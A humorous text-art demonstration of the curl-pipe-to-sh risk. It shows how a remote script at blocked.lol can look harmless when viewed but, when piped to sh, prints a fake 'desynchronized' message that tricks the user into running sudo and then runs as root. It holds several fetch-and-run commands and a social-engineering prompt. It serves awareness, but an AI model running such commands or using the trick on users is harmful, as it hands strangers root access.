
              @@@@@@@   @@@  @@@@@@@   @@@  @@@  @@@   @@@@@@@@
              @@@@@@@@  @@@  @@@@@@@@  @@@  @@@@ @@@  @@@@@@@@@
              @@!  @@@  @@!  @@!  @@@  @@!  @@!@!@@@  !@@
              !@!  @!@  !@!  !@!  @!@  !@!  !@!!@!@!  !@!
              @!@@!@!   !!@  @!@@!@!   !!@  @!@ !!@!  !@! @!@!@
              !!@!!!    !!!  !!@!!!    !!!  !@!  !!!  !!! !!@!!
              !!:       !!:  !!:       !!:  !!:  !!!  :!!   !!:
              :!:       :!:  :!:       :!:  :!:  !:!  :!:   !::
               ::        ::   ::        ::   ::   ::   ::: ::::
               :        :     :        :    ::    :    :: :: :


        @@@@@@@   @@@@@@      @@@@@@@    @@@@@@    @@@@@@   @@@  @@@
        @@@@@@@  @@@@@@@@     @@@@@@@@  @@@@@@@@  @@@@@@@   @@@  @@@
          @@!    @@!  @@@     @@!  @@@  @@!  @@@  !@@       @@!  @@@
          !@!    !@!  @!@     !@   @!@  !@!  @!@  !@!       !@!  @!@
          @!!    @!@  !@!     @!@!@!@   @!@!@!@!  !!@@!!    @!@!@!@!
          !!!    !@!  !!!     !!!@!!!!  !!!@!!!!   !!@!!!   !!!@!!!!
          !!:    !!:  !!!     !!:  !!!  !!:  !!!       !:!  !!:  !!!
          :!:    :!:  !:!     :!:  !:!  :!:  !:!      !:!   :!:  !:!
           ::    ::::: ::      :: ::::  ::   :::  :::: ::   ::   :::
           :      : :  :      :: : ::    :   : :  :: : :     :   : :


                            - a short novel -


Nowadays it's very common for installation scripts to just recommend
running something like $ curl -sL https://ourdomain.com/install | sh

You want to get it working ASAP? You just run it.

Have you ever been bitten by someone modifying these scripts?

You'd probably do this then:

$ curl -sL https://blocked.lol/greetz.sh
# blocked.lol greetingz shell script 2020
# We declare USERNAME variable with the result of whoami
USERNAME=$(whoami)

# Finally by invoking the built-in echo command, we say Hello $USERNAME
echo "Hello $USERNAME"

Fine, this script is safe after all... but wait, what?

$ curl -sL https://blocked.lol/greetz.sh | sh
-e
curl is desynchronized!
Run sudo curl -sS ntppool.org to fix
$ sudo curl -sS ntppool.org
Password:
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.17.8</center>
</body>
</html>
$ curl -sL https://blocked.lol/greetz.sh | sh
Hello root
I am root! Try cat -t on greetz.sh

                      ____...
             .-"--"""".__    `.
            |            `    |
  (         `._....------.._.:
   )         .()''        ``().
  '          () .=='  `===  `-.
   . )       (         g)
    )         )     /        J
   (          |.   /      . (
   $$         (.  (_'.   , )|`
   ||         |\`-....--'/  ' \
  /||.         \\ | | | /  /   \.
 //||(\         \`-===-'  '     \o.
.//7' |)         `. --   / (     OObaaaad888b.
(<<. / |     .a888b`.__.'d\     OO888888888888a.
 \  Y' |    .8888888aaaa88POOOOOO888888888888888.
  \  \ |   .888888888888888888888888888888888888b
   |   |  .d88888P88888888888888888888888b8888888.
   b.--d .d88888P8888888888888888a:f888888|888888b
   88888b 888888|8888888888888888888888888\8888888

Do you want to know what happened? Run this

$ curl -sL https://blocked.lol/greetz.sh | cat -t
